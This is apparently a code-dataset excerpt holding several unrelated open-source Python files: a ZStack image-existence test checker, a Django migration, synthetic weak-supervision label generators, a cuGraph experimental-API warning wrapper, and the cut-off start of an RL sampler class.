zstackwoodpecker/zstackwoodpecker/zstack_test/kvm_checker/zstack_kvm_image_checker.py
|
sherry546/zstack-woodpecker
| 1
|
6628456
|
import os
import sys
import traceback
import zstackwoodpecker.header.checker as checker_header
import zstackwoodpecker.header.image as image_header
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstacklib.utils.http as http
import zstacklib.utils.jsonobject as jsonobject
import zstacktestagent.plugins.vm as vm_plugin
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
import apibinding.inventory as inventory
class zstack_kvm_image_file_checker(checker_header.TestChecker):
    '''check kvm image file existence. If it is in backup storage,
    return self.judge(True). If not, return self.judge(False)'''
    def check(self):
        super(zstack_kvm_image_file_checker, self).check()
        image = self.test_obj.image
        # Only the first backup-storage ref of the image is checked.
        backupStorages = image.backupStorageRefs
        bs_one = backupStorages[0]
        bs = test_lib.lib_get_backup_storage_by_uuid(bs_one.backupStorageUuid)
        if bs.type == inventory.SFTP_BACKUP_STORAGE_TYPE:
            self.judge(test_lib.lib_check_backup_storage_image_file(image))
        elif hasattr(inventory, 'IMAGE_STORE_BACKUP_STORAGE_TYPE') and bs.type == inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
            # hasattr guard: older inventory modules lack this constant.
            if self.test_obj.state == image_header.DELETED:
                test_util.test_logger("skip image store image delete check, since the image won't be deleted until no vms refer to it.")
                return self.judge(self.exp_result)
            self.judge(test_lib.lib_check_backup_storage_image_file(image))
        elif bs.type == inventory.CEPH_BACKUP_STORAGE_TYPE:
            if self.test_obj.state == image_header.DELETED:
                #https://github.com/zstackorg/zstack/issues/93#issuecomment-130935998
                test_util.test_logger("skip ceph image delete check, since the image won't be deleted until no vms refer to it.")
                return self.judge(self.exp_result)
            # For ceph, probe the rbd image directly over SSH on a monitor host
            # (10-second timeout); a nonzero/handled result means the file exists.
            ceph_host, username, password = test_lib.lib_get_ceph_info(os.environ.get('cephBackupStorageMonUrls'))
            image_installPath = bs_one.installPath.split('ceph://')[1]
            command = 'rbd info %s' % image_installPath
            if test_lib.lib_execute_ssh_cmd(ceph_host, username, password, command, 10):
                test_util.test_logger('Check result: [image:] %s [file:] %s exist on ceph [host name:] %s .' % (image.uuid, image_installPath, ceph_host))
                return self.judge(True)
            else:
                test_util.test_logger('Check result: [image:] %s [file:] %s does not exist on ceph [host name:] %s .' % (image.uuid, image_installPath, ceph_host))
                return self.judge(False)
|
import os
import sys
import traceback
import zstackwoodpecker.header.checker as checker_header
import zstackwoodpecker.header.image as image_header
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstacklib.utils.http as http
import zstacklib.utils.jsonobject as jsonobject
import zstacktestagent.plugins.vm as vm_plugin
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
import apibinding.inventory as inventory
class zstack_kvm_image_file_checker(checker_header.TestChecker):
    '''check kvm image file existence. If it is in backup storage,
    return self.judge(True). If not, return self.judge(False)'''
    def check(self):
        super(zstack_kvm_image_file_checker, self).check()
        image = self.test_obj.image
        # Only the first backup-storage ref of the image is checked.
        backupStorages = image.backupStorageRefs
        bs_one = backupStorages[0]
        bs = test_lib.lib_get_backup_storage_by_uuid(bs_one.backupStorageUuid)
        if bs.type == inventory.SFTP_BACKUP_STORAGE_TYPE:
            self.judge(test_lib.lib_check_backup_storage_image_file(image))
        elif hasattr(inventory, 'IMAGE_STORE_BACKUP_STORAGE_TYPE') and bs.type == inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
            # hasattr guard: older inventory modules lack this constant.
            if self.test_obj.state == image_header.DELETED:
                test_util.test_logger("skip image store image delete check, since the image won't be deleted until no vms refer to it.")
                return self.judge(self.exp_result)
            self.judge(test_lib.lib_check_backup_storage_image_file(image))
        elif bs.type == inventory.CEPH_BACKUP_STORAGE_TYPE:
            if self.test_obj.state == image_header.DELETED:
                #https://github.com/zstackorg/zstack/issues/93#issuecomment-130935998
                test_util.test_logger("skip ceph image delete check, since the image won't be deleted until no vms refer to it.")
                return self.judge(self.exp_result)
            # For ceph, probe the rbd image directly over SSH on a monitor host
            # (10-second timeout); a nonzero/handled result means the file exists.
            ceph_host, username, password = test_lib.lib_get_ceph_info(os.environ.get('cephBackupStorageMonUrls'))
            image_installPath = bs_one.installPath.split('ceph://')[1]
            command = 'rbd info %s' % image_installPath
            if test_lib.lib_execute_ssh_cmd(ceph_host, username, password, command, 10):
                test_util.test_logger('Check result: [image:] %s [file:] %s exist on ceph [host name:] %s .' % (image.uuid, image_installPath, ceph_host))
                return self.judge(True)
            else:
                test_util.test_logger('Check result: [image:] %s [file:] %s does not exist on ceph [host name:] %s .' % (image.uuid, image_installPath, ceph_host))
                return self.judge(False)
|
en
| 0.570243
|
check kvm image file existencex . If it is in backup storage, return self.judge(True). If not, return self.judge(False) #https://github.com/zstackorg/zstack/issues/93#issuecomment-130935998
| 1.855205
| 2
|
user/migrations/0006_alter_verify_add_token.py
|
ThePokerFaCcCe/messenger
| 0
|
6628457
|
# Generated by Django 3.2.10 on 2022-01-03 21:26
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add a nullable, indexed `token` CharField
    to the VerifyCode model. Do not hand-edit generated operations."""

    dependencies = [
        ('user', '0005_alter_token_fields'),
    ]

    operations = [
        migrations.AddField(
            model_name='verifycode',
            name='token',
            field=models.CharField(auto_created=True, db_index=True, max_length=128, null=True, verbose_name='Token'),
        ),
    ]
|
# Generated by Django 3.2.10 on 2022-01-03 21:26
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: add a nullable, indexed `token` CharField
    to the VerifyCode model. Do not hand-edit generated operations."""

    dependencies = [
        ('user', '0005_alter_token_fields'),
    ]

    operations = [
        migrations.AddField(
            model_name='verifycode',
            name='token',
            field=models.CharField(auto_created=True, db_index=True, max_length=128, null=True, verbose_name='Token'),
        ),
    ]
|
en
| 0.800435
|
# Generated by Django 3.2.10 on 2022-01-03 21:26
| 1.628454
| 2
|
wrench/synthetic/dataset_generator.py
|
Stranger469/wrench
| 1
|
6628458
|
<filename>wrench/synthetic/dataset_generator.py
from typing import Optional, Union
import numpy as np
from .syntheticdataset import BaseSyntheticGenerator
class ConditionalIndependentGenerator(BaseSyntheticGenerator):
    """Synthetic weak-label generator where each labeling function (LF)
    fires independently of the others given the true class.

    Per LF, an accuracy-like parameter alpha and a propensity-like parameter
    beta are drawn uniformly from [x - radius, x + radius], clipped to [0, 1].
    """
    def __init__(self,
                 n_class: int,
                 n_lfs: int,
                 class_prior: Optional[Union[list, np.ndarray]] = None,
                 lf_prior: Optional[Union[list, np.ndarray]] = None,
                 alpha: Optional[float] = 0.7,
                 alpha_radius: Optional[float] = 0.5,
                 beta: Optional[float] = 0.1,
                 beta_radius: Optional[float] = 0.1,
                 random_state=None):
        super().__init__(n_class, n_lfs, class_prior, lf_prior, random_state)
        # Per-LF alpha/beta samples; bounds clipped so the interval stays in [0, 1].
        self.alpha_l = self.generator.uniform(low=max(0, alpha - alpha_radius), high=min(1, alpha + alpha_radius), size=n_lfs)
        self.beta_l = self.generator.uniform(low=max(0, beta - beta_radius), high=min(1, beta + beta_radius), size=n_lfs)

    def generate(self, n_data: int = 1000):
        """Sample `n_data` examples; weak label -1 means the LF abstained.

        Returns a dict with 'ids', 'examples', 'labels' and the
        n_data x n_lfs 'weak_labels' matrix (as nested lists).
        """
        ids = list(range(n_data))
        examples = list(range(n_data))
        labels = list(self.generator.choice(self.n_class, size=n_data, p=self.class_prior))
        weak_labels = []
        for i, y in enumerate(labels):
            weak_label = []
            for alpha, beta, target in zip(self.alpha_l, self.beta_l, self.lf_targets):
                # Firing probability depends on whether the LF's fixed target
                # matches the true label y; scaled by the class prior.
                # NOTE(review): formula assumes p stays <= 1 for the chosen
                # priors/parameters — confirm for small class priors.
                if target == y:
                    p = alpha * beta / self.class_prior[y]
                else:
                    p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
                if self.generator.random() < p:
                    weak_label.append(target)
                else:
                    weak_label.append(-1)  # abstain
            weak_labels.append(weak_label)
        return {
            'ids'        : ids,
            'examples'   : examples,
            'labels'     : labels,
            'weak_labels': weak_labels,
        }
class DataDependentGenerator(ConditionalIndependentGenerator):
    """Generator whose LF accuracy depends on a latent cluster of each data
    point: an LF is less accurate on clusters it is not assigned to."""

    def __init__(self,
                 n_class: int,
                 n_lfs: int,
                 n_cluster: int = 10,
                 n_cluster_per_lfs: int = 2,
                 class_prior: Optional[Union[list, np.ndarray]] = None,
                 lf_prior: Optional[Union[list, np.ndarray]] = None,
                 alpha: Optional[float] = 0.7,
                 beta: Optional[float] = 0.1,
                 gamma: Optional[float] = 0.3,
                 alpha_radius: Optional[float] = 0.5,
                 random_state=None):
        # BUGFIX: the original passed ``alpha, beta, alpha_radius, random_state``
        # positionally into the parent signature
        # ``(..., alpha, alpha_radius, beta, beta_radius, random_state)``,
        # which swapped beta/alpha_radius and dropped random_state into
        # beta_radius (so the seed was never propagated). Keyword arguments
        # restore the intended mapping; parent's beta_radius keeps its default.
        super().__init__(n_class, n_lfs, class_prior, lf_prior, alpha=alpha,
                         alpha_radius=alpha_radius, beta=beta, random_state=random_state)
        self.n_cluster = n_cluster
        self.n_cluster_per_lfs = n_cluster_per_lfs
        # Clusters each LF specializes in; elsewhere its accuracy is penalized.
        self.lf_pro_clusters = [self.generator.choice(n_cluster, size=n_cluster_per_lfs) for _ in range(n_lfs)]
        self.gamma_l = self.generator.uniform(low=0, high=gamma, size=n_lfs)

    def generate(self, n_data: int = 1000):
        """Draw ``n_data`` points with cluster-dependent LF accuracy;
        -1 in ``weak_labels`` marks an abstaining LF."""
        ids = list(range(n_data))
        examples = list(range(n_data))
        labels = list(self.generator.choice(self.n_class, size=n_data, p=self.class_prior))
        clusters = list(self.generator.choice(self.n_cluster, size=n_data))
        weak_labels = []
        for i, y in enumerate(labels):
            weak_label = []
            cluster = clusters[i]
            for alpha, beta, gamma, target, lf_pro_clusters in \
                    zip(self.alpha_l, self.beta_l, self.gamma_l, self.lf_targets, self.lf_pro_clusters):
                if cluster not in lf_pro_clusters:
                    # Penalize accuracy outside the LF's own clusters (floor 0.1).
                    alpha = max(alpha - gamma, 0.1)
                if target == y:
                    p = alpha * beta / self.class_prior[y]
                else:
                    p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
                if self.generator.random() < p:
                    weak_label.append(target)
                else:
                    weak_label.append(-1)
            weak_labels.append(weak_label)
        return {
            'ids': ids,
            'examples': examples,
            'labels': labels,
            'weak_labels': weak_labels,
        }
class CorrelatedGenerator(ConditionalIndependentGenerator):
    """Generator with correlated LFs: some LFs overlap with, conflict with, or
    duplicate a "normal" LF. Dependencies are recorded in ``dep_graph`` as
    ``(dependent_lf, target_lf)`` pairs."""

    def __init__(self,
                 n_class: int,
                 n_lfs: int,
                 n_overlap: Optional[int] = 0,
                 n_conflict: Optional[int] = 0,
                 n_duplicate: Optional[int] = 1,
                 class_prior: Optional[Union[list, np.ndarray]] = None,
                 lf_prior: Optional[Union[list, np.ndarray]] = None,
                 alpha: Optional[float] = 0.7,
                 beta: Optional[float] = 0.1,
                 alpha_radius: Optional[float] = 0.3,
                 overlap_theta: Optional[float] = 0.8,
                 conflict_theta: Optional[float] = 0.8,
                 random_state=None):
        self.n_overlap = n_overlap
        self.overlap_theta = overlap_theta
        self.n_conflict = n_conflict
        self.conflict_theta = conflict_theta
        self.n_duplicate = n_duplicate
        # At least one independent ("normal") LF must remain.
        assert n_overlap + n_conflict + n_duplicate < n_lfs
        # BUGFIX: the original passed ``alpha, beta, alpha_radius, random_state``
        # positionally into the parent signature
        # ``(..., alpha, alpha_radius, beta, beta_radius, random_state)``,
        # swapping beta/alpha_radius and dropping random_state into
        # beta_radius. Keyword arguments restore the intended mapping.
        super().__init__(n_class, n_lfs, class_prior, lf_prior, alpha=alpha,
                         alpha_radius=alpha_radius, beta=beta, random_state=random_state)
        # Partition LF indices into overlap / conflict / duplicate / normal.
        lf_pool = list(range(self.n_lfs))
        self.overlap_lfs = self.generator.choice(lf_pool, size=n_overlap, replace=False)
        lf_pool = [i for i in lf_pool if i not in self.overlap_lfs]
        self.conflict_lfs = self.generator.choice(lf_pool, size=n_conflict, replace=False)
        lf_pool = [i for i in lf_pool if i not in self.conflict_lfs]
        self.duplicate_lfs = self.generator.choice(lf_pool, size=n_duplicate, replace=False)
        self.normal_lfs = [i for i in lf_pool if i not in self.duplicate_lfs]
        # Each dependent LF is tied to one normal LF.
        self.overlap_target_lf = self.generator.choice(self.normal_lfs, size=n_overlap, replace=False)
        self.conflict_target_lf = self.generator.choice(self.normal_lfs, size=n_conflict, replace=False)
        self.duplicate_target_lf = self.generator.choice(self.normal_lfs, size=n_duplicate, replace=False)
        self.dep_graph = []
        for overlap_lf, target in zip(self.overlap_lfs, self.overlap_target_lf):
            # Overlapping LF votes for the same label as its target LF.
            self.lf_targets[overlap_lf] = self.lf_targets[target]
            self.dep_graph.append((overlap_lf, target))
        for conflict_lf, target in zip(self.conflict_lfs, self.conflict_target_lf):
            # Conflicting LF votes for a *different* label than its target LF.
            self.lf_targets[conflict_lf] = self.sample_other_label(self.lf_targets[target])
            self.dep_graph.append((conflict_lf, target))
        for duplicate_lf, target in zip(self.duplicate_lfs, self.duplicate_target_lf):
            self.lf_targets[duplicate_lf] = self.lf_targets[target]
            self.dep_graph.append((duplicate_lf, target))

    def generate(self, n_data: int = 1000):
        """Draw ``n_data`` points; dependent LFs condition their firing on
        their target LF's vote. -1 marks an abstaining LF."""
        ids = list(range(n_data))
        examples = list(range(n_data))
        labels = list(self.generator.choice(self.n_class, size=n_data, p=self.class_prior))
        weak_labels = []
        for i, y in enumerate(labels):
            weak_label = -np.ones(self.n_lfs, dtype=int)
            # 1) Independent LFs fire as in the conditionally-independent model.
            for j in self.normal_lfs:
                alpha, beta, target = self.alpha_l[j], self.beta_l[j], self.lf_targets[j]
                if target == y:
                    p = alpha * beta / self.class_prior[y]
                else:
                    p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
                if self.generator.random() < p:
                    weak_label[j] = target
            # 2) Overlap LFs: fire with prob overlap_theta when the target LF
            #    fired, otherwise fall back to the independent model.
            for j, m in zip(self.overlap_lfs, self.overlap_target_lf):
                target = self.lf_targets[j]
                if weak_label[m] != -1:
                    if self.generator.random() < self.overlap_theta:
                        weak_label[j] = target
                else:
                    alpha, beta = self.alpha_l[j], self.beta_l[j]
                    if target == y:
                        p = alpha * beta / self.class_prior[y]
                    else:
                        p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
                    if self.generator.random() < p:
                        weak_label[j] = target
            # 3) Conflict LFs: same gating, but their target label disagrees
            #    with the LF they depend on (set up in __init__).
            for j, m in zip(self.conflict_lfs, self.conflict_target_lf):
                target = self.lf_targets[j]
                if weak_label[m] != -1:
                    if self.generator.random() < self.conflict_theta:
                        weak_label[j] = target
                else:
                    alpha, beta = self.alpha_l[j], self.beta_l[j]
                    if target == y:
                        p = alpha * beta / self.class_prior[y]
                    else:
                        p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
                    if self.generator.random() < p:
                        weak_label[j] = target
            # 4) Duplicate LFs copy their target LF's vote verbatim.
            for j, m in zip(self.duplicate_lfs, self.duplicate_target_lf):
                weak_label[j] = weak_label[m]
            weak_labels.append(weak_label.tolist())
        return {
            'ids': ids,
            'examples': examples,
            'labels': labels,
            'weak_labels': weak_labels,
        }
|
<filename>wrench/synthetic/dataset_generator.py
from typing import Optional, Union
import numpy as np
from .syntheticdataset import BaseSyntheticGenerator
class ConditionalIndependentGenerator(BaseSyntheticGenerator):
def __init__(self,
n_class: int,
n_lfs: int,
class_prior: Optional[Union[list, np.ndarray]] = None,
lf_prior: Optional[Union[list, np.ndarray]] = None,
alpha: Optional[float] = 0.7,
alpha_radius: Optional[float] = 0.5,
beta: Optional[float] = 0.1,
beta_radius: Optional[float] = 0.1,
random_state=None):
super().__init__(n_class, n_lfs, class_prior, lf_prior, random_state)
self.alpha_l = self.generator.uniform(low=max(0, alpha - alpha_radius), high=min(1, alpha + alpha_radius), size=n_lfs)
self.beta_l = self.generator.uniform(low=max(0, beta - beta_radius), high=min(1, beta + beta_radius), size=n_lfs)
def generate(self, n_data: int = 1000):
ids = list(range(n_data))
examples = list(range(n_data))
labels = list(self.generator.choice(self.n_class, size=n_data, p=self.class_prior))
weak_labels = []
for i, y in enumerate(labels):
weak_label = []
for alpha, beta, target in zip(self.alpha_l, self.beta_l, self.lf_targets):
if target == y:
p = alpha * beta / self.class_prior[y]
else:
p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
if self.generator.random() < p:
weak_label.append(target)
else:
weak_label.append(-1)
weak_labels.append(weak_label)
return {
'ids' : ids,
'examples' : examples,
'labels' : labels,
'weak_labels': weak_labels,
}
class DataDependentGenerator(ConditionalIndependentGenerator):
    """Generator whose LF accuracy depends on a latent cluster of each data
    point: an LF is less accurate on clusters it is not assigned to."""

    def __init__(self,
                 n_class: int,
                 n_lfs: int,
                 n_cluster: int = 10,
                 n_cluster_per_lfs: int = 2,
                 class_prior: Optional[Union[list, np.ndarray]] = None,
                 lf_prior: Optional[Union[list, np.ndarray]] = None,
                 alpha: Optional[float] = 0.7,
                 beta: Optional[float] = 0.1,
                 gamma: Optional[float] = 0.3,
                 alpha_radius: Optional[float] = 0.5,
                 random_state=None):
        # BUGFIX: the original passed ``alpha, beta, alpha_radius, random_state``
        # positionally into the parent signature
        # ``(..., alpha, alpha_radius, beta, beta_radius, random_state)``,
        # which swapped beta/alpha_radius and dropped random_state into
        # beta_radius (so the seed was never propagated). Keyword arguments
        # restore the intended mapping; parent's beta_radius keeps its default.
        super().__init__(n_class, n_lfs, class_prior, lf_prior, alpha=alpha,
                         alpha_radius=alpha_radius, beta=beta, random_state=random_state)
        self.n_cluster = n_cluster
        self.n_cluster_per_lfs = n_cluster_per_lfs
        # Clusters each LF specializes in; elsewhere its accuracy is penalized.
        self.lf_pro_clusters = [self.generator.choice(n_cluster, size=n_cluster_per_lfs) for _ in range(n_lfs)]
        self.gamma_l = self.generator.uniform(low=0, high=gamma, size=n_lfs)

    def generate(self, n_data: int = 1000):
        """Draw ``n_data`` points with cluster-dependent LF accuracy;
        -1 in ``weak_labels`` marks an abstaining LF."""
        ids = list(range(n_data))
        examples = list(range(n_data))
        labels = list(self.generator.choice(self.n_class, size=n_data, p=self.class_prior))
        clusters = list(self.generator.choice(self.n_cluster, size=n_data))
        weak_labels = []
        for i, y in enumerate(labels):
            weak_label = []
            cluster = clusters[i]
            for alpha, beta, gamma, target, lf_pro_clusters in \
                    zip(self.alpha_l, self.beta_l, self.gamma_l, self.lf_targets, self.lf_pro_clusters):
                if cluster not in lf_pro_clusters:
                    # Penalize accuracy outside the LF's own clusters (floor 0.1).
                    alpha = max(alpha - gamma, 0.1)
                if target == y:
                    p = alpha * beta / self.class_prior[y]
                else:
                    p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
                if self.generator.random() < p:
                    weak_label.append(target)
                else:
                    weak_label.append(-1)
            weak_labels.append(weak_label)
        return {
            'ids': ids,
            'examples': examples,
            'labels': labels,
            'weak_labels': weak_labels,
        }
class CorrelatedGenerator(ConditionalIndependentGenerator):
    """Generator with correlated LFs: some LFs overlap with, conflict with, or
    duplicate a "normal" LF. Dependencies are recorded in ``dep_graph`` as
    ``(dependent_lf, target_lf)`` pairs."""

    def __init__(self,
                 n_class: int,
                 n_lfs: int,
                 n_overlap: Optional[int] = 0,
                 n_conflict: Optional[int] = 0,
                 n_duplicate: Optional[int] = 1,
                 class_prior: Optional[Union[list, np.ndarray]] = None,
                 lf_prior: Optional[Union[list, np.ndarray]] = None,
                 alpha: Optional[float] = 0.7,
                 beta: Optional[float] = 0.1,
                 alpha_radius: Optional[float] = 0.3,
                 overlap_theta: Optional[float] = 0.8,
                 conflict_theta: Optional[float] = 0.8,
                 random_state=None):
        self.n_overlap = n_overlap
        self.overlap_theta = overlap_theta
        self.n_conflict = n_conflict
        self.conflict_theta = conflict_theta
        self.n_duplicate = n_duplicate
        # At least one independent ("normal") LF must remain.
        assert n_overlap + n_conflict + n_duplicate < n_lfs
        # BUGFIX: the original passed ``alpha, beta, alpha_radius, random_state``
        # positionally into the parent signature
        # ``(..., alpha, alpha_radius, beta, beta_radius, random_state)``,
        # swapping beta/alpha_radius and dropping random_state into
        # beta_radius. Keyword arguments restore the intended mapping.
        super().__init__(n_class, n_lfs, class_prior, lf_prior, alpha=alpha,
                         alpha_radius=alpha_radius, beta=beta, random_state=random_state)
        # Partition LF indices into overlap / conflict / duplicate / normal.
        lf_pool = list(range(self.n_lfs))
        self.overlap_lfs = self.generator.choice(lf_pool, size=n_overlap, replace=False)
        lf_pool = [i for i in lf_pool if i not in self.overlap_lfs]
        self.conflict_lfs = self.generator.choice(lf_pool, size=n_conflict, replace=False)
        lf_pool = [i for i in lf_pool if i not in self.conflict_lfs]
        self.duplicate_lfs = self.generator.choice(lf_pool, size=n_duplicate, replace=False)
        self.normal_lfs = [i for i in lf_pool if i not in self.duplicate_lfs]
        # Each dependent LF is tied to one normal LF.
        self.overlap_target_lf = self.generator.choice(self.normal_lfs, size=n_overlap, replace=False)
        self.conflict_target_lf = self.generator.choice(self.normal_lfs, size=n_conflict, replace=False)
        self.duplicate_target_lf = self.generator.choice(self.normal_lfs, size=n_duplicate, replace=False)
        self.dep_graph = []
        for overlap_lf, target in zip(self.overlap_lfs, self.overlap_target_lf):
            # Overlapping LF votes for the same label as its target LF.
            self.lf_targets[overlap_lf] = self.lf_targets[target]
            self.dep_graph.append((overlap_lf, target))
        for conflict_lf, target in zip(self.conflict_lfs, self.conflict_target_lf):
            # Conflicting LF votes for a *different* label than its target LF.
            self.lf_targets[conflict_lf] = self.sample_other_label(self.lf_targets[target])
            self.dep_graph.append((conflict_lf, target))
        for duplicate_lf, target in zip(self.duplicate_lfs, self.duplicate_target_lf):
            self.lf_targets[duplicate_lf] = self.lf_targets[target]
            self.dep_graph.append((duplicate_lf, target))

    def generate(self, n_data: int = 1000):
        """Draw ``n_data`` points; dependent LFs condition their firing on
        their target LF's vote. -1 marks an abstaining LF."""
        ids = list(range(n_data))
        examples = list(range(n_data))
        labels = list(self.generator.choice(self.n_class, size=n_data, p=self.class_prior))
        weak_labels = []
        for i, y in enumerate(labels):
            weak_label = -np.ones(self.n_lfs, dtype=int)
            # 1) Independent LFs fire as in the conditionally-independent model.
            for j in self.normal_lfs:
                alpha, beta, target = self.alpha_l[j], self.beta_l[j], self.lf_targets[j]
                if target == y:
                    p = alpha * beta / self.class_prior[y]
                else:
                    p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
                if self.generator.random() < p:
                    weak_label[j] = target
            # 2) Overlap LFs: fire with prob overlap_theta when the target LF
            #    fired, otherwise fall back to the independent model.
            for j, m in zip(self.overlap_lfs, self.overlap_target_lf):
                target = self.lf_targets[j]
                if weak_label[m] != -1:
                    if self.generator.random() < self.overlap_theta:
                        weak_label[j] = target
                else:
                    alpha, beta = self.alpha_l[j], self.beta_l[j]
                    if target == y:
                        p = alpha * beta / self.class_prior[y]
                    else:
                        p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
                    if self.generator.random() < p:
                        weak_label[j] = target
            # 3) Conflict LFs: same gating, but their target label disagrees
            #    with the LF they depend on (set up in __init__).
            for j, m in zip(self.conflict_lfs, self.conflict_target_lf):
                target = self.lf_targets[j]
                if weak_label[m] != -1:
                    if self.generator.random() < self.conflict_theta:
                        weak_label[j] = target
                else:
                    alpha, beta = self.alpha_l[j], self.beta_l[j]
                    if target == y:
                        p = alpha * beta / self.class_prior[y]
                    else:
                        p = (1 - alpha) * beta / (self.class_prior[y] * (self.n_class - 1))
                    if self.generator.random() < p:
                        weak_label[j] = target
            # 4) Duplicate LFs copy their target LF's vote verbatim.
            for j, m in zip(self.duplicate_lfs, self.duplicate_target_lf):
                weak_label[j] = weak_label[m]
            weak_labels.append(weak_label.tolist())
        return {
            'ids': ids,
            'examples': examples,
            'labels': labels,
            'weak_labels': weak_labels,
        }
|
none
| 1
| 2.385055
| 2
|
|
python/pylibcugraph/pylibcugraph/utilities/api_tools.py
|
AyodeAwe/cugraph
| 0
|
6628459
|
# Copyright (c) 2022, <NAME>.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import warnings
import inspect
experimental_prefix = "EXPERIMENTAL"


def experimental_warning_wrapper(obj, make_public_name=True):
    """
    Return a callable obj wrapped in a callable that prints a warning about it
    being "experimental" (an object that is in the public API but subject to
    change or removal) prior to calling it and returning its value.

    If make_public_name is False, the object's name used in the warning message
    is left unmodified. If True (default), any leading __ and/or EXPERIMENTAL
    string are removed from the name used in warning messages. This allows an
    object to be named with a "private" name in the public API so it can remain
    hidden while it is still experimental, but have a public name within the
    experimental namespace so it can be easily discovered and used.
    """
    obj_name = obj.__qualname__
    if make_public_name:
        # BUGFIX: str.lstrip() treats its argument as a *character set*, so
        # ``lstrip("EXPERIMENTAL")`` would also eat leading letters of the
        # real name (e.g. "EXPERIMENTALExample" -> "xample"). Strip the
        # literal prefix (and surrounding underscores) instead.
        obj_name = obj_name.lstrip("_")
        if obj_name.startswith(experimental_prefix):
            obj_name = obj_name[len(experimental_prefix):]
        obj_name = obj_name.lstrip("_")
    # Assume the caller of this function is the module containing the
    # experimental obj and try to get its namespace name. Default to no
    # namespace name if it could not be found.
    call_stack = inspect.stack()
    calling_frame = call_stack[1].frame
    ns_name = calling_frame.f_locals.get("__name__")
    if ns_name is not None:
        ns_name += "."
    else:
        ns_name = ""
    warning_msg = (f"{ns_name}{obj_name} is experimental and will change "
                   "or be removed in a future release.")

    @functools.wraps(obj)
    def callable_warning_wrapper(*args, **kwargs):
        warnings.warn(warning_msg, PendingDeprecationWarning)
        return obj(*args, **kwargs)

    return callable_warning_wrapper
|
# Copyright (c) 2022, <NAME>.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import warnings
import inspect
experimental_prefix = "EXPERIMENTAL"


def experimental_warning_wrapper(obj, make_public_name=True):
    """
    Return a callable obj wrapped in a callable that prints a warning about it
    being "experimental" (an object that is in the public API but subject to
    change or removal) prior to calling it and returning its value.

    If make_public_name is False, the object's name used in the warning message
    is left unmodified. If True (default), any leading __ and/or EXPERIMENTAL
    string are removed from the name used in warning messages. This allows an
    object to be named with a "private" name in the public API so it can remain
    hidden while it is still experimental, but have a public name within the
    experimental namespace so it can be easily discovered and used.
    """
    obj_name = obj.__qualname__
    if make_public_name:
        # BUGFIX: str.lstrip() treats its argument as a *character set*, so
        # ``lstrip("EXPERIMENTAL")`` would also eat leading letters of the
        # real name (e.g. "EXPERIMENTALExample" -> "xample"). Strip the
        # literal prefix (and surrounding underscores) instead.
        obj_name = obj_name.lstrip("_")
        if obj_name.startswith(experimental_prefix):
            obj_name = obj_name[len(experimental_prefix):]
        obj_name = obj_name.lstrip("_")
    # Assume the caller of this function is the module containing the
    # experimental obj and try to get its namespace name. Default to no
    # namespace name if it could not be found.
    call_stack = inspect.stack()
    calling_frame = call_stack[1].frame
    ns_name = calling_frame.f_locals.get("__name__")
    if ns_name is not None:
        ns_name += "."
    else:
        ns_name = ""
    warning_msg = (f"{ns_name}{obj_name} is experimental and will change "
                   "or be removed in a future release.")

    @functools.wraps(obj)
    def callable_warning_wrapper(*args, **kwargs):
        warnings.warn(warning_msg, PendingDeprecationWarning)
        return obj(*args, **kwargs)

    return callable_warning_wrapper
|
en
| 0.84412
|
# Copyright (c) 2022, <NAME>. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Return a callable obj wrapped in a callable the prints a warning about it being "experimental" (an object that is in the public API but subject to change or removal) prior to calling it and returning its value. If make_public_name is False, the object's name used in the warning message is left unmodified. If True (default), any leading __ and/or EXPERIMENTAL string are removed from the name used in warning messages. This allows an object to be named with a "private" name in the public API so it can remain hidden while it is still experimental, but have a public name within the experimental namespace so it can be easily discovered and used. # Assume the caller of this function is the module containing the # experimental obj and try to get its namespace name. Default to no # namespace name if it could not be found.
| 2.791401
| 3
|
src_py/rlpytorch/sampler/sampler.py
|
r-woo/elfai
| 3,305
|
6628460
|
# Copyright (c) 2018-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from elf.options import auto_import_options, PyOptionSpec
from .sample_methods import sample_multinomial, epsilon_greedy
class Sampler(object):
    """Samples actions from the policy distributions stored in a state dict."""

    @classmethod
    def get_option_spec(cls):
